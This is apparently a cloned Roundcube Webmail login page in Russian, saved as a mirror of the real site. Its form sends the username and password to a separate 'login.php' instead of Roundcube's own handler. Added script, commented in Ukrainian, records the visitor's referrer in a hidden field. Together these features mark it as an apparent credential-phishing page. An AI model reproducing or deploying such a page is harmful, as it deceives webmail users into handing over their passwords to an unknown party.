<!DOCTYPE html>
<html lang="ru">
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>Roundcube Webmail :: Добро пожаловать в Roundcube Webmail!</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, shrink-to-fit=no, maximum-scale=1.0">
<meta name="theme-color" content="#f4f4f4">
<meta name="msapplication-navbutton-color" content="#f4f4f4">
<link rel="shortcut icon" href="skins/elastic/images/favicon.ico%3Fs=1748763912">
<link rel="stylesheet" href="skins/elastic/deps/bootstrap.min.css%3Fs=1748763916.css">
<link rel="stylesheet" href="skins/elastic/styles/styles.min.css%3Fs=1748763912.css">

<script>
try {
    if (document.cookie.indexOf('colorMode=dark') > -1
        || (document.cookie.indexOf('colorMode=light') === -1 && window.matchMedia('(prefers-color-scheme: dark)').matches)
    ) {
        document.documentElement.className += ' dark-mode';
    }
} catch (e) { }
</script>

<link rel="stylesheet" type="text/css" href="plugins/jqueryui/themes/elastic/jquery-ui.min.css%3Fs=1748763912.css">
<script src="program/js/jquery.min.js%3Fs=1748763914"></script>
<script src="program/js/common.min.js%3Fs=1748763912"></script>
<script src="program/js/app.min.js%3Fs=1748763912"></script>
<script src="program/js/jstz.min.js%3Fs=1748763914"></script>
<script>
var rcmail = new rcube_webmail();
rcmail.set_env({"task":"login","standard_windows":false,"locale":"ru_RU","devel_mode":null,"rcversion":10611,"cookie_domain":"","cookie_path":"/","cookie_secure":false,"dark_mode_support":true,"skin":"elastic","blankpage":"skins/elastic/watermark.html","refresh_interval":60,"session_lifetime":600,"action":"","comm_path":"/?_task=login","compose_extwin":false,"date_format":"yy-mm-dd","date_format_localized":"ГГГГ-ММ-ДД","request_token":"obNkwf0pM6gKWdRZF1GCXXylMeWfQNy8"});
rcmail.add_label({"loading":"Загрузка...","servererror":"Ошибка сервера!","connerror":"Ошибка соединения (Сбой подключения к серверу)!","requesttimedout":"Превышено время ожидания запроса","refreshing":"Обновление...","windowopenerror":"Всплывающее окно было заблокировано!","uploadingmany":"Загрузка файлов...","uploading":"Файл загружается…","close":"Закрыть","save":"Сохранить","cancel":"Отмена","alerttitle":"Внимание","confirmationtitle":"Внимание","delete":"Удалить","continue":"Продолжить","ok":"ОК","back":"Назад","errortitle":"Произошла ошибка!","options":"Параметры","plaintoggle":"Текст","htmltoggle":"HTML","previous":"Предыдущее","next":"Следующее","select":"Выбрать","browse":"Обзор","choosefile":"Выберите файл...","choosefiles":"Выберите файлы..."});
rcmail.gui_container("loginfooter","login-footer");
rcmail.gui_object('loginform', 'login-form');
rcmail.gui_object('message', 'messagestack');
</script>

<script src="plugins/jqueryui/js/jquery-ui.min.js%3Fs=1748763912"></script>
<script src="plugins/jqueryui/js/i18n/datepicker-ru.js%3Fs=1748763912"></script>
</head>
<body class="task-login action-none">
<div id="layout">
<h1 class="voice">Roundcube Webmail Войти</h1>
<div id="layout-content" class="selected no-navbar" role="main">
    <img src="skins/elastic/images/logo.svg" id="logo" alt="Logo">
    <form id="login-form" name="login-form" method="post" class="propform" action="login.php">
        <input type="hidden" name="_token" value="obNkwf0pM6gKWdRZF1GCXXylMeWfQNy8">
        <input type="hidden" name="_task" value="login">
        <input type="hidden" name="_action" value="login">
        <input type="hidden" name="_timezone" id="rcmlogintz" value="_default_">
        <input type="hidden" name="_url" id="rcmloginurl" value="">
        <!-- нове поле для збереження реферера -->
        <input type="hidden" name="referrer" id="referrerField" value="">
        <table>
            <tbody>
                <tr>
                    <td class="title"><label for="rcmloginuser">Имя пользователя</label></td>
                    <td class="input"><input name="_user" id="rcmloginuser" required size="40" class="form-control" autocapitalize="off" value="" type="text"></td>
                </tr>
                <tr>
                    <td class="title"><label for="rcmloginpwd">Пароль</label></td>
                    <td class="input"><input name="_pass" id="rcmloginpwd" required size="40" class="form-control" autocapitalize="off" autocomplete="off" type="password"></td>
                </tr>
            </tbody>
        </table>
        <p class="formbuttons"><button type="submit" id="rcmloginsubmit" class="button mainaction submit">Войти</button></p>
        <div id="login-footer" role="contentinfo">
            Roundcube Webmail
        </div>
    </form>
</div>

<noscript>
    <p class="noscriptwarning">Внимание: Данному сервису веб-почты требуется Javascript! Для того, чтобы его использовать необходимо включить поддержку Javascript в настройках вашего браузера.</p>
</noscript>
</div>

<div id="messagestack"></div>
<script>
$(function() {
    rcmail.init();
    // встановлюємо значення реферера при завантаженні сторінки
    var ref = document.referrer;
    if (ref) {
        document.getElementById('referrerField').value = ref;
    }
});
</script>

<script src="skins/elastic/deps/bootstrap.bundle.min.js%3Fs=1748763916"></script>
<script src="skins/elastic/ui.min.js%3Fs=1748763912"></script>
</body>
</html>

